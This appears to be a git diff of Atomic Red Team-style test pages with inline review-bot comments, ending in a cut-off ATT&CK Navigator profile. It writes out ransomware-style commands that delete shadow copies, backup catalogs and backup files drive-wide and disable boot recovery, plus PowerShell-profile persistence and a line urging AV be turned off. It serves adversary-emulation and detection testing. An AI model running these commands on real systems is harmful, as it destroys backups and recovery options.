@@ -31,7 +31,7 @@ Command-line examples:(Citation: XSL Bypass Mar 2019)(Citation: LOLBAS Wmic)
## Atomic Test #1 - MSXSL Bypass using local files
-Executes the code specified within a XSL script tag during XSL transformation using a local payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
+Executes the code specified within a XSL script tag during XSL transformation using a local payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714. Open Calculator.exe when test sucessfully executed, while AV turned off.
**Supported Platforms:** Windows
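Review bot: "Open Calculator.exe when test sucessfully executed, while AV turned off." is ungrammatical and misspells "successfully"; suggest "Upon successful execution, calc.exe will be launched (antivirus may block this test)." The same sentence is added verbatim to Tests #2 and #4 below and should be fixed in all three places. Stating "AV turned off" as a precondition also pushes operators toward disabling protection, which the description should not do.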
@@ -84,7 +84,7 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - MSXSL Bypass using remote files
-Executes the code specified within a XSL script tag during XSL transformation using a remote payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
+Executes the code specified within a XSL script tag during XSL transformation using a remote payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714. Open Calculator.exe when test sucessfully executed, while AV turned off.
**Supported Platforms:** Windows
@@ -132,7 +132,7 @@ Executes the code specified within a XSL script using a local payload.
```cmd
-wmic.exe #{wmic_command} /FORMAT:#{local_xsl_file}
+wmic #{wmic_command} /FORMAT:"#{local_xsl_file}"
```
@@ -157,7 +157,7 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #4 - WMIC bypass using remote XSL file
-Executes the code specified within a XSL script using a remote payload.
+Executes the code specified within a XSL script using a remote payload. Open Calculator.exe when test sucessfully executed, while AV turned off.
**Supported Platforms:** Windows
@@ -175,7 +175,7 @@ Executes the code specified within a XSL script using a remote payload.
```cmd
-wmic.exe #{wmic_command} /FORMAT:#{remote_xsl_file}
+wmic #{wmic_command} /FORMAT:"#{remote_xsl_file}"
```
diff --git a/Atomic_Threat_Coverage/Triggers/T1485.md b/Atomic_Threat_Coverage/Triggers/T1485.md
index 66d0d18..f7b2f8b 100644
--- a/Atomic_Threat_Coverage/Triggers/T1485.md
+++ b/Atomic_Threat_Coverage/Triggers/T1485.md
@@ -8,103 +8,16 @@ To maximize impact on the target organization in operations where network-wide a
## Atomic Tests
-- [Atomic Test #1 - Windows - Delete Volume Shadow Copies](#atomic-test-1---windows---delete-volume-shadow-copies)
+- [Atomic Test #1 - Windows - Overwrite file with Sysinternals SDelete](#atomic-test-1---windows---overwrite-file-with-sysinternals-sdelete)
-- [Atomic Test #2 - Windows - Delete Windows Backup Catalog](#atomic-test-2---windows---delete-windows-backup-catalog)
-
-- [Atomic Test #3 - Windows - Disable Windows Recovery Console Repair](#atomic-test-3---windows---disable-windows-recovery-console-repair)
-
-- [Atomic Test #4 - Windows - Overwrite file with Sysinternals SDelete](#atomic-test-4---windows---overwrite-file-with-sysinternals-sdelete)
-
-- [Atomic Test #5 - macOS/Linux - Overwrite file with DD](#atomic-test-5---macoslinux---overwrite-file-with-dd)
-
-- [Atomic Test #6 - Windows - Delete Backup Files](#atomic-test-6---windows---delete-backup-files)
+- [Atomic Test #2 - macOS/Linux - Overwrite file with DD](#atomic-test-2---macoslinux---overwrite-file-with-dd)
-## Atomic Test #1 - Windows - Delete Volume Shadow Copies
-Deletes Windows Volume Shadow Copies. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
-
-
-```cmd
-vssadmin.exe delete shadows /all /quiet
-```
-
-
-
-
-
-
-
-
-
-## Atomic Test #2 - Windows - Delete Windows Backup Catalog
-Deletes Windows Backup Catalog. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
-
-
-```cmd
-wbadmin.exe delete catalog -quiet
-```
-
-
-
-
-
-
-
-
-
-## Atomic Test #3 - Windows - Disable Windows Recovery Console Repair
-Disables repair by the Windows Recovery Console on boot.
-This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
-
-
-```cmd
-bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
-bcdedit.exe /set {default} recoveryenabled no
-```
-
-#### Cleanup Commands:
-```cmd
-bcdedit.exe /set {default} bootstatuspolicy DisplayAllFailures
-bcdedit.exe /set {default} recoveryenabled yes
-```
-
-
-
-
-
-
-
-
-## Atomic Test #4 - Windows - Overwrite file with Sysinternals SDelete
-Overwrites and deletes a file using Sysinternals SDelete.
-Requires the download of either Sysinternals Suite or the individual SDelete utility.
+## Atomic Test #1 - Windows - Overwrite file with Sysinternals SDelete
+Overwrites and deletes a file using Sysinternals SDelete. Upon successful execution, "Files deleted: 1" will be displayed in
+the powershell session along with other information about the file that was deleted.
**Supported Platforms:** Windows
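Review bot: removing Tests #1, #2, #3 and #6 from T1485 is justified because they duplicate T1490 Tests #1, #3, #4 and #6 in the T1490 diff further down, but the dropped sentence "Requires the download of either Sysinternals Suite or the individual SDelete utility" should stay in the new Test #1 description so readers see the prerequisite before reaching the dependency block; also check that any detection rule mapped to T1485 for vssadmin, wbadmin, bcdedit or backup-file deletion now points at T1490.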
@@ -114,15 +27,15 @@ Requires the download of either Sysinternals Suite or the individual SDelete uti
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
-| sdelete_exe | Path of sdelete executable | Path | PathToAtomicsFolder\T1485\bin\sdelete.exe|
+| sdelete_exe | Path of sdelete executable | Path | $env:TEMP\Sdelete\sdelete.exe|
+| file_to_delete | Path of file to delete | path | $env:TEMP\T1485.txt|
#### Attack Commands: Run with `powershell`!
```powershell
-New-Item $env:TEMP\T1485.txt
-#{sdelete_exe} -accepteula $env:TEMP\T1485.txt
+Invoke-Expression -Command "#{sdelete_exe} -accepteula #{file_to_delete}"
```
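Review bot: `Invoke-Expression -Command "#{sdelete_exe} -accepteula #{file_to_delete}"` breaks as soon as either path contains a space (the default `$env:TEMP` does for any user with a space in their profile name), because the expanded string is re-parsed unquoted; use the call operator with quoted arguments instead: `& "#{sdelete_exe}" -accepteula "#{file_to_delete}"`. Minor: the new `file_to_delete` row uses type `path` while the row above uses `Path`.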
@@ -132,14 +45,22 @@ New-Item $env:TEMP\T1485.txt
##### Description: Secure delete tool from Sysinternals must exist on disk at specified location (#{sdelete_exe})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{sdelete_exe}) {0} else {1}
+if (Test-Path #{sdelete_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
Invoke-WebRequest "https://download.sysinternals.com/files/SDelete.zip" -OutFile "$env:TEMP\SDelete.zip"
Expand-Archive $env:TEMP\SDelete.zip $env:TEMP\Sdelete -Force
-New-Item -ItemType Directory (Split-Path "#{sdelete_exe}") -Force | Out-Null
-Copy-Item $env:TEMP\Sdelete\sdelete.exe "#{sdelete_exe}" -Force
+Remove-Item $env:TEMP\SDelete.zip -Force
+```
+##### Description: The file to delete must exist at #{file_to_delete}
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{file_to_delete}) { exit 0 } else { exit 1 }
+```
+##### Get Prereq Commands:
+```powershell
+New-Item #{file_to_delete} -Force | Out-Null
```
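Review bot: the Get Prereq commands no longer copy the extracted binary to `#{sdelete_exe}`, so if a user overrides `sdelete_exe` to anything other than `$env:TEMP\Sdelete\sdelete.exe` the check `if (Test-Path #{sdelete_exe}) {exit 0} else {exit 1}` still fails after the prereq has run; either keep a `Copy-Item $env:TEMP\Sdelete\sdelete.exe "#{sdelete_exe}" -Force` line or document that the input must match the extraction directory. The SDelete.zip from that URL also ships `sdelete64.exe`, which is the binary to prefer on 64-bit hosts. The new `exit 0`/`exit 1` in the check is a correct fix of the old bare `{0}`/`{1}`.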
@@ -148,7 +69,7 @@ Copy-Item $env:TEMP\Sdelete\sdelete.exe "#{sdelete_exe}" -Force
-## Atomic Test #5 - macOS/Linux - Overwrite file with DD
+## Atomic Test #2 - macOS/Linux - Overwrite file with DD
Overwrites and deletes a file using DD.
To stop the test, break the command with CTRL/CMD+C.
@@ -176,28 +97,4 @@ dd of=#{file_to_overwrite} if=#{overwrite_source}
-
-
-
-## Atomic Test #6 - Windows - Delete Backup Files
-Deletes backup files in a manner similar to Ryuk ransomware.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
-
-
-```cmd
-del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk >nul 2>&1
-```
-
-
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Triggers/T1489.md b/Atomic_Threat_Coverage/Triggers/T1489.md
index 24ab489..c0e7b2e 100644
--- a/Atomic_Threat_Coverage/Triggers/T1489.md
+++ b/Atomic_Threat_Coverage/Triggers/T1489.md
@@ -16,7 +16,9 @@ Adversaries may accomplish this by disabling individual services of high importa
## Atomic Test #1 - Windows - Stop service using Service Controller
-Stops a specified service using the sc.exe command.
+Stops a specified service using the sc.exe command. Upon execution, if the spooler service was running infomration will be displayed saying
+it has changed to a state of STOP_PENDING. If the spooler service was not running "The service has not been started." will be displayed and it can be
+started by running the cleanup command.
**Supported Platforms:** Windows
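Review bot: the new description hard-codes "spooler" while the command below takes `#{service_name}` (see `sc.exe start #{service_name}` in the next hunk), so say "the default service (spooler)" or reference the input; also fix "infomration" and note that the `STOP_PENDING` state is what `sc stop` reports immediately, before the service has actually stopped.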
@@ -49,7 +51,9 @@ sc.exe start #{service_name}
## Atomic Test #2 - Windows - Stop service using net.exe
-Stops a specified service using the net.exe command.
+Stops a specified service using the net.exe command. Upon execution, if the service was running "The Print Spooler service was stopped successfully."
+will be displayed. If the service was not running, "The Print Spooler service is not started." will be displayed and it can be
+started by running the cleanup command.
**Supported Platforms:** Windows
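Review bot: "The Print Spooler service was stopped successfully." is only the output for the default `#{service_name}`; `net stop` prints the display name of whichever service is passed, so phrase it as "the service's display name, e.g. Print Spooler" rather than as the fixed expected string.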
@@ -82,8 +86,10 @@ net.exe start #{service_name}
## Atomic Test #3 - Windows - Stop service by killing process
-Stops a specified service killng the service's process.
-This technique was used by WannaCry.
+Stops a specified service killng the service's process.
+This technique was used by WannaCry. Upon execution, if the spoolsv service was running "SUCCESS: The process "spoolsv.exe" with PID 2316 has been terminated."
+will be displayed. If the service was not running "ERROR: The process "spoolsv.exe" not found." will be displayed and it can be
+started by running the cleanup command.
**Supported Platforms:** Windows
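Review bot: the PID in `SUCCESS: The process "spoolsv.exe" with PID 2316 has been terminated.` is specific to one run and will confuse readers comparing output; write it as `PID <pid>`. The line also keeps the pre-existing typo "killng" and nests unescaped double quotes inside a quoted string, which renders oddly in the markdown.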
diff --git a/Atomic_Threat_Coverage/Triggers/T1490.md b/Atomic_Threat_Coverage/Triggers/T1490.md
index 3fde178..d0bf847 100644
--- a/Atomic_Threat_Coverage/Triggers/T1490.md
+++ b/Atomic_Threat_Coverage/Triggers/T1490.md
@@ -21,11 +21,18 @@ A number of native Windows utilities have been used by adversaries to disable or
- [Atomic Test #5 - Windows - Delete Volume Shadow Copies via WMI with PowerShell](#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell)
+- [Atomic Test #6 - Windows - Delete Backup Files](#atomic-test-6---windows---delete-backup-files)
+
## Atomic Test #1 - Windows - Delete Volume Shadow Copies
-Deletes Windows Volume Shadow Copies. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
+Deletes Windows Volume Shadow Copies. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. Upon
+execution, if no shadow volumes exist the message "No items found that satisfy the query." will be displayed. If shadow volumes are present, it
+will delete them without printing output to the screen. This is because the /quiet parameter was passed which also suppresses the y/n
+confirmation prompt. Shadow copies can only be created on Windows server or Windows 8.
+
+https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc788055(v=ws.11)
**Supported Platforms:** Windows
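Review bot: "Shadow copies can only be created on Windows server or Windows 8" overstates the limitation; what is restricted is the `vssadmin create shadow` subcommand used by the new prereq, while client editions still create shadow copies through System Restore or WMI, so the sentence should be narrowed to the prereq command (the linked cc788055 page is the Server 2012 R2 reference for exactly that subcommand). The rest of the added text about `/quiet` suppressing both output and the y/n prompt is accurate.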
@@ -43,6 +50,18 @@ vssadmin.exe delete shadows /all /quiet
+#### Dependencies: Run with `powershell`!
+##### Description: Create volume shadow copy of C:\ . This prereq command only works on Windows Server or Windows 8.
+##### Check Prereq Commands:
+```powershell
+if(!(vssadmin.exe list shadows | findstr "No items found that satisfy the query.")) { exit 0 } else { exit 1 }
+```
+##### Get Prereq Commands:
+```powershell
+vssadmin.exe create shadow /for=c:
+```
+
+
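Review bot: the check `if(!(vssadmin.exe list shadows | findstr "No items found that satisfy the query.")) { exit 0 } else { exit 1 }` is wrong because findstr treats a space-separated argument as several independent search strings, so it matches any output line containing "No", "the", "that", etc.; when a shadow copy exists, `vssadmin list shadows` prints an attributes line containing "No auto release", findstr matches, and the check reports the prereq as unmet and creates another shadow every run. Use `findstr /C:"No items found"` or, since this runs under PowerShell, `if (vssadmin.exe list shadows | Select-String -Quiet -SimpleMatch "No items found") { exit 1 } else { exit 0 }`. Note as well that the dependency block is not marked as elevation-required while `vssadmin list shadows` needs admin; unelevated it prints an error and no match, which makes the check exit 0 falsely.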
@@ -50,6 +69,7 @@ vssadmin.exe delete shadows /all /quiet
## Atomic Test #2 - Windows - Delete Volume Shadow Copies via WMI
Deletes Windows Volume Shadow Copies via WMI. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
+Shadow copies can only be created on Windows server or Windows 8.
**Supported Platforms:** Windows
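Review bot: same "Shadow copies can only be created on Windows server or Windows 8" sentence as in Test #1; since this test deletes via `wmic.exe shadowcopy delete` and has no create step, the remark belongs with the Test #1 prereq, not here.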
@@ -73,7 +93,8 @@ wmic.exe shadowcopy delete
## Atomic Test #3 - Windows - Delete Windows Backup Catalog
-Deletes Windows Backup Catalog. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
+Deletes Windows Backup Catalog. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. Upon execution,
+"The backup catalog has been successfully deleted." will be displayed in the PowerShell session.
**Supported Platforms:** Windows
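Review bot: the added sentence says the message appears "in the PowerShell session", but this test runs with `command_prompt` (see the removed T1485 copy of it above), so say "in the console"; it would also help to state what `wbadmin.exe delete catalog -quiet` prints when no backup catalog exists, because on a fresh test VM that is the common case.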
@@ -97,8 +118,8 @@ wbadmin.exe delete catalog -quiet
## Atomic Test #4 - Windows - Disable Windows Recovery Console Repair
-Disables repair by the Windows Recovery Console on boot.
-This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
+Disables repair by the Windows Recovery Console on boot. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
+Upon execution, "The operation completed successfully." will be displayed in the powershell session.
**Supported Platforms:** Windows
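Review bot: the test issues two `bcdedit.exe /set` commands, so "The operation completed successfully." is printed twice, once per command; the description should say so, and "powershell session" is again inconsistent with the `command_prompt` executor.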
@@ -114,6 +135,11 @@ bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
bcdedit.exe /set {default} recoveryenabled no
```
+#### Cleanup Commands:
+```cmd
+bcdedit.exe /set {default} bootstatuspolicy DisplayAllFailures
+bcdedit.exe /set {default} recoveryenabled yes
+```
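Review bot: the cleanup `bcdedit.exe /set {default} bootstatuspolicy DisplayAllFailures` and `recoveryenabled yes` restores the Windows defaults rather than the values present before the test; on hosts with a customised boot policy that is still a change, so either document that the cleanup resets to defaults or have the attack step record `bcdedit /enum {default}` output first. Good to see the cleanup carried over with the test from T1485.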
@@ -123,9 +149,35 @@ bcdedit.exe /set {default} recoveryenabled no
## Atomic Test #5 - Windows - Delete Volume Shadow Copies via WMI with PowerShell
-Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject.
+Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject.
This technique is used by numerous ransomware families such as Sodinokibi/REvil.
-Executes Get-WMIObject
+Executes Get-WMIObject. Shadow copies can only be created on Windows server or Windows 8, so upon execution
+there may be no output displayed.
+
+**Supported Platforms:** Windows
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
+
+
+```powershell
+Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
+```
+
+
+
+
+
+
+
+
+
+## Atomic Test #6 - Windows - Delete Backup Files
+Deletes backup files in a manner similar to Ryuk ransomware. Upon exection, many "access is denied" messages will appear as the commands try
+to delete files from around the system.
**Supported Platforms:** Windows
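Review bot: in the Test #5 description, "Shadow copies can only be created on Windows server or Windows 8, so upon execution there may be no output displayed" gives the wrong reason: `$_.Delete()` on a Get-WmiObject instance returns nothing, so there is no output on success on any OS; say "no output is displayed on success" and drop the OS clause. In the new Test #6 description fix "exection", and the "access is denied" messages it mentions only appear because the command no longer redirects to `>nul 2>&1` (compare the removed T1485 version), which is worth stating explicitly.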
@@ -137,7 +189,7 @@ Executes Get-WMIObject
```cmd
-powershell.exe -Command "Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}"
+del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk
```
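Review bot: `del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk` recursively deletes every matching file on the whole system drive, including real backups and VHDs, and the test carries no warning and no input to scope it; add a prominent note that it must only be run on a disposable lab host, and consider a `#{backup_root}` input defaulting to a test directory with the drive-wide form given as the realistic variant. Dropping the old `>nul 2>&1` is fine and matches the new description.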
diff --git a/Atomic_Threat_Coverage/Triggers/T1502.md b/Atomic_Threat_Coverage/Triggers/T1502.md
index 1f6dbeb..5030475 100644
--- a/Atomic_Threat_Coverage/Triggers/T1502.md
+++ b/Atomic_Threat_Coverage/Triggers/T1502.md
@@ -15,6 +15,9 @@ Explicitly assigning the PPID may also enable [Privilege Escalation](https://att
## Atomic Test #1 - Parent PID Spoofing using PowerShell
This test uses PowerShell to replicates how Cobalt Strike does ppid spoofing and masquerade a spawned process.
+Upon execution, "Process C:\Program Files\Internet Explorer\iexplore.exe is spawned with pid ####" will be displayed and
+calc.exe will be launched.
+
Credit to In Ming Loh (https://github.com/countercept/ppid-spoofing/blob/master/PPID-Spoof.ps1)
**Supported Platforms:** Windows
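Review bot: the added sentence should say that `C:\Program Files\Internet Explorer\iexplore.exe` is the spoofed parent, i.e. calc.exe appears under that PID in the process tree; as written a reader may take iexplore.exe for the payload. "replicates how Cobalt Strike does" in the line above should be "replicate".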
diff --git a/Atomic_Threat_Coverage/Triggers/T1504.md b/Atomic_Threat_Coverage/Triggers/T1504.md
index 05fa4c6..7e24322 100644
--- a/Atomic_Threat_Coverage/Triggers/T1504.md
+++ b/Atomic_Threat_Coverage/Triggers/T1504.md
@@ -14,7 +14,7 @@ An adversary may also be able to escalate privileges if a script in a PowerShell
## Atomic Test #1 - Append malicious start-process cmdlet
-Appends a start process cmdlet to the current user's powershell profile pofile that points to a malicious executable
+Appends a start process cmdlet to the current user's powershell profile pofile that points to a malicious executable. Upon execution, calc.exe will be launched.
**Supported Platforms:** Windows
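Review bot: the touched description line still contains "powershell profile pofile"; delete the duplicated word so it reads "the current user's PowerShell profile". Since the Start-Process line is appended to the profile, the added "calc.exe will be launched" only happens when the follow-up `powershell -Command exit` (or any later PowerShell start) loads that profile, which is worth saying here.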
@@ -32,14 +32,9 @@ Appends a start process cmdlet to the current user's powershell profile pofile t
```powershell
-if(Test-Path #{ps_profile}){
-}
-else{
- New-Item -Path #{ps_profile} -Type File -Force
-}
-$malicious = "Start-Process #{exe_path}"
-Add-Content #{ps_profile} -Value $malicious
-powershell -command exit
+Add-Content #{ps_profile} -Value ""
+Add-Content #{ps_profile} -Value "Start-Process #{exe_path}"
+powershell -Command exit
```
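Review bot: moving the profile-exists logic out to a dependency block is the right cleanup, but `Add-Content #{ps_profile} -Value ""` and `Add-Content #{ps_profile} -Value "Start-Process #{exe_path}"` leave `#{ps_profile}` unquoted, and the user profile path commonly contains a space (Documents under a profile name with a space); quote the path argument, and the same applies to `#{exe_path}` inside the appended `Start-Process` line.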
#### Cleanup Commands:
@@ -50,6 +45,18 @@ Set-Content $profile -Value $oldprofile
+#### Dependencies: Run with `powershell`!
+##### Description: Ensure a powershell profile exists for the current user
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{ps_profile}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Path #{ps_profile} -Type File -Force
+```
+
+
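Review bot: when the prereq `New-Item -Path #{ps_profile} -Type File -Force` is what created the profile, the cleanup (`Set-Content $profile -Value $oldprofile` above) leaves an empty profile file behind that did not exist before the test; either have the cleanup remove the file when `$oldprofile` is empty, or note the leftover in the cleanup description. The check `if (Test-Path #{ps_profile}) {exit 0} else {exit 1}` has the same unquoted-path issue as the attack commands.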
diff --git a/Atomic_Threat_Coverage/Triggers/T1518.md b/Atomic_Threat_Coverage/Triggers/T1518.md
index 36b4531..b22d2b7 100644
--- a/Atomic_Threat_Coverage/Triggers/T1518.md
+++ b/Atomic_Threat_Coverage/Triggers/T1518.md
@@ -12,7 +12,8 @@
## Atomic Test #1 - Find and Display Internet Explorer Browser Version
-Adversaries may attempt to get a listing of non-security related software that is installed on the system. Adversaries may use the information from Software Discovery during automated discovery to shape follow-on behaviors
+Query the registry to determine the version of internet explorer installed on the system.
+Upon execution, version information about internet explorer will be displayed.
**Supported Platforms:** Windows
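Review bot: "internet explorer" should be capitalised as the product name in both new lines, and since the command below queries the `svcVersion` value it is worth saying that this reports the IE 10+ servicing version rather than the legacy `Version` value, so on older hosts the query returns nothing.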
@@ -36,7 +37,8 @@ reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer" /v svcVersio
## Atomic Test #2 - Applications Installed
-Adversaries may attempt to get a listing of all software that is installed on the system. Adversaries may use the information from Software Discovery during automated discovery to shape follow-on behaviors
+Query the registry to determine software and versions installed on the system. Upon execution a table of
+software name and version information will be displayed.
**Supported Platforms:** Windows
diff --git a/Atomic_Threat_Coverage/Triggers/T1531.md b/Atomic_Threat_Coverage/Triggers/T1531.md
index a41ee07..61f31b7 100644
--- a/Atomic_Threat_Coverage/Triggers/T1531.md
+++ b/Atomic_Threat_Coverage/Triggers/T1531.md
@@ -14,7 +14,8 @@ Adversaries may also subsequently log off and/or reboot boxes to set malicious c
## Atomic Test #1 - Change User Password - Windows
-Changes the user password to hinder access attempts. Seen in use by LockerGoga.
+Changes the user password to hinder access attempts. Seen in use by LockerGoga. Upon execution, log into the user account "AtomicAdministrator" with
+the password "HuHuHUHoHo283283".
**Supported Platforms:** Windows
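Review bot: the new description hard-codes the account name "AtomicAdministrator" and the password "HuHuHUHoHo283283", which are the defaults of the `#{user_account}` and `#{new_user_password}` inputs used by `net user #{user_account} #{new_user_password} /add` in the next hunk; refer to the inputs instead so the text stays right when they are overridden, and phrase it as a verification step ("To verify, log in as ...") rather than something that happens "upon execution".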
@@ -61,7 +62,7 @@ net user #{user_account} #{new_user_password} /add
## Atomic Test #2 - Delete User - Windows
-Deletes a user account to prevent access.
+Deletes a user account to prevent access. Upon execution, run the command "net user" to verify that the new "AtomicUser" account was deleted.
**Supported Platforms:** Windows
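Review bot: same issue as Test #1, the description hard-codes "AtomicUser" instead of `#{user_account}`; also `net user` listing the account as absent is the verification step, so word it as "To verify, run net user and confirm #{user_account} is no longer listed".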
diff --git a/analytics/generated/attack_navigator_profiles/atc_attack_navigator_profile.json b/analytics/generated/attack_navigator_profiles/atc_attack_navigator_profile.json
index 64f96ea..ebb4ada 100644
--- a/analytics/generated/attack_navigator_profiles/atc_attack_navigator_profile.json
+++ b/analytics/generated/attack_navigator_profiles/atc_attack_navigator_profile.json
@@ -1 +1 @@
-{"name": "ATC-Export", "version": "2.1", "domain": "mitre-enterprise", "description": "", "filters": {"stages": ["act"], "platforms": ["linux", "windows"]}, "sorting": 0, "viewMode": 0, "hideDisabled": true, "techniques": [{"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1212", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1077", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1087", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1087", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1075", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1075", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1114", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1114", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1070", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1078", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1107", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1066", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0195", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": 
true}, {"techniqueID": "T0005", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1210", "tactic": "initial-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1210", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1190", "tactic": "initial-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1190", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1075", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0002", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1050", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1050", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1136", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1078", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1075", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": 
"#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1099", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1210", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0002", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1098", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1098", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0002", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0002", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1054", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1075", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1073", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": 